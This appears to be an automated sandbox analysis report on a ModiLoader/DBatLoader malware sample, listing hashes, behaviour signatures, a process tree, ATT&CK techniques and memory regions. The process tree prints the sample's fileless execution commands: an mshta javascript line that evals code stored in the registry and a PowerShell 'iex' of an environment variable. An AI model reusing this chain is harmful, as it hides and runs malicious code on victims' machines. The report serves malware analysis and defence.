Analysis

  • max time kernel
    141s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-06-2024 06:53

General

  • Target

    90e514ab5532f9c4aa32853d01c0616f_JaffaCakes118.exe

  • Size

    250KB

  • MD5

    90e514ab5532f9c4aa32853d01c0616f

  • SHA1

    e78edbbcc0a65d976e8989992b917abd589a3f8d

  • SHA256

    69374205ca4a89f57008a708cc6d46fbfeb8cf6a8cba3ddbf5cf4985519f8d62

  • SHA512

    252f02b9907b84d24eb162db5d56911e129a266389e259c210c775045ded2bf713f7b9d725123abd747afb3d86df5c3f04920f085305d373b5f828a76566587f

  • SSDEEP

    3072:2UVXjZ2twLWD72984VQr7nWdeZj/Yzk82/LpSHvX8wV4ynzwJ:2a0tw+72zVQ/ieZj/kR884yn4

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\90e514ab5532f9c4aa32853d01c0616f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\90e514ab5532f9c4aa32853d01c0616f_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Users\Admin\AppData\Local\Temp\90e514ab5532f9c4aa32853d01c0616f_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\90e514ab5532f9c4aa32853d01c0616f_JaffaCakes118.exe"
      2⤵
        PID:2132
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:iXgRU9e="Pd1li";Sp30=new%20ActiveXObject("WScript.Shell");TrDYW1DN="GsI";pjbG8=Sp30.RegRead("HKLM\\software\\Wow6432Node\\5T6tXZe6\\uncF97");NzUKD2Ui6="S";eval(pjbG8);P57OUIjJ="vghrflz";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4508
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:gpvsoanu
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1540

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hwfnrwvc.05l.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1540-27-0x0000000005B30000-0x0000000005E84000-memory.dmp
      Filesize

      3.3MB

    • memory/1540-16-0x0000000005360000-0x00000000053C6000-memory.dmp
      Filesize

      408KB

    • memory/1540-13-0x0000000002870000-0x00000000028A6000-memory.dmp
      Filesize

      216KB

    • memory/1540-14-0x0000000005420000-0x0000000005A48000-memory.dmp
      Filesize

      6.2MB

    • memory/1540-30-0x00000000076D0000-0x0000000007D4A000-memory.dmp
      Filesize

      6.5MB

    • memory/1540-29-0x0000000005FB0000-0x0000000005FFC000-memory.dmp
      Filesize

      304KB

    • memory/1540-28-0x0000000005F90000-0x0000000005FAE000-memory.dmp
      Filesize

      120KB

    • memory/1540-17-0x0000000005AC0000-0x0000000005B26000-memory.dmp
      Filesize

      408KB

    • memory/1540-15-0x0000000005240000-0x0000000005262000-memory.dmp
      Filesize

      136KB

    • memory/1540-31-0x0000000007070000-0x000000000708A000-memory.dmp
      Filesize

      104KB

    • memory/2132-8-0x00000000009A0000-0x0000000000A62000-memory.dmp
      Filesize

      776KB

    • memory/2132-6-0x00000000009A0000-0x0000000000A62000-memory.dmp
      Filesize

      776KB

    • memory/2132-11-0x00000000009A0000-0x0000000000A62000-memory.dmp
      Filesize

      776KB

    • memory/2132-4-0x0000000000400000-0x0000000000436000-memory.dmp
      Filesize

      216KB

    • memory/2132-5-0x0000000000400000-0x0000000000436000-memory.dmp
      Filesize

      216KB

    • memory/2132-7-0x00000000009A0000-0x0000000000A62000-memory.dmp
      Filesize

      776KB

    • memory/2132-2-0x0000000000400000-0x0000000000436000-memory.dmp
      Filesize

      216KB

    • memory/2132-9-0x00000000009A0000-0x0000000000A62000-memory.dmp
      Filesize

      776KB

    • memory/2132-10-0x00000000009A0000-0x0000000000A62000-memory.dmp
      Filesize

      776KB